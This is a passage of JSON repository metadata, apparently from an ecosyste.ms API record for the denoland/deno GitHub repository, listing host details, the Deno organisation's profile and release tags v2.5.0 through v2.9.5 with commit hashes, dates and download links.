vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36827962,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"ssl_error","status_checked_at":"2026-08-22T15:14:58.237Z","response_time":51,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.